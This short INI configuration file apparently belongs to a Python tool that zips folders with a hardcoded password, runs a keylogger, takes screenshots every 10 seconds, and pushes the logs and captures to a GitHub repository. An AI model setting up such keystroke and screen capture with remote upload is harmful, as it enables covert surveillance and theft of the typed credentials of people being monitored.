[dezipper]
zip_path = C:/Users/User/Desktop/test.zip
extract_path = C:/Users/User/Desktop/test2
password = uiopuiop

[zipper]
#Specify the path of the folder to be zipped
folder_path = C:/Users/User/Desktop/test
# Specify the path of the output zip file
zip_path = C:/Users/User/Desktop/test.zip
# Specify the password of the output zip file
password = uiopuiop
# Specify the path of the repo where it will say when it is done
repo_name = pythontest

[keylogger]
file_name = logger.txt
repo_name = pythontest
push_to_github_amount = 100

[screenshot]
repo_name = pythontest
interval = 10